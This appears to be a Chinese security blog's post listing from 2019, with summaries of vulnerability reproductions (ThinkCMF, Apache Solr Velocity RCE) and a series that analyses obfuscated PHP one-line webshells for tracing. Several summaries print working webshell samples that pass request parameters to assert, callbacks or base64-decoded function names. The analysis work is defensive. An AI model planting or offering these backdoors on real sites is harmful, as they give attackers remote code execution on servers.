摘要:ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一、ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需 阅读全文
posted @ 2019-11-05 13:28 雨中落叶 阅读 (334) 评论 (1) 编辑
摘要:Apache Solr Velocity模板注入RCE漏洞复现 一、Apache Solr介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过http get操作提 阅读全文
posted @ 2019-11-04 13:28 雨中落叶 阅读 (478) 评论 (0) 编辑
摘要:WebShell代码分析溯源(十一) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代码分析 1、调整代码格式 2、分析代码 2.1、首 阅读全文
posted @ 2019-11-03 13:57 雨中落叶 阅读 (44) 评论 (0) 编辑
摘要:WebShell代码分析溯源(十) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];register_shutdown_function($e, $_REQUEST['REQUEST']);?> 二、代码分析 1、调整代码格式 2、分析代码 1、首先使用REQUEST方法接 阅读全文
posted @ 2019-11-03 10:29 雨中落叶 阅读 (47) 评论 (0) 编辑
摘要:WebShell代码分析溯源(九) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['pass'] => '|.*|e',);array_walk($arr, $e, '');?> 二、代码分析 1、调整代码格式 2、分析代码 1、首 阅读全文
posted @ 2019-11-02 14:31 雨中落叶 阅读 (31) 评论 (0) 编辑
摘要:WebShell代码分析溯源(八) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr= array('test', $_REQUEST['POST']);uasort($arr, base64_decode($e));?> 二、代码分析 1、调整代码格式 2、分析代码 阅读全文
posted @ 2019-11-02 11:01 雨中落叶 阅读 (26) 评论 (0) 编辑
摘要:WebShell代码分析溯源(七) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['POST'],);array_map(base64_decode($e), $arr);?> 二、代码分析 1、调整代码格式 2、分析代码 分析代码 阅读全文
posted @ 2019-11-02 09:52 雨中落叶 阅读 (41) 评论 (0) 编辑
摘要:WebShell代码分析溯源 一、一句话变形马样本 <?php call_user_func('assert', $_REQUEST['assert']); ?> 二、代码分析 1、分析代码 call_user_func('assert', $_REQUEST['assert'])中assert是第 阅读全文
posted @ 2019-11-01 14:11 雨中落叶 阅读 (34) 评论 (0) 编辑
摘要:WebShell代码分析溯源(五) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?> 二、代码分析 1、调整代码格式 2、分析代码 首先使用R 阅读全文
posted @ 2019-11-01 12:18 雨中落叶 阅读 (33) 评论 (0) 编辑
摘要:WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").(" 阅读全文
posted @ 2019-10-31 12:49 雨中落叶 阅读 (42) 评论 (0) 编辑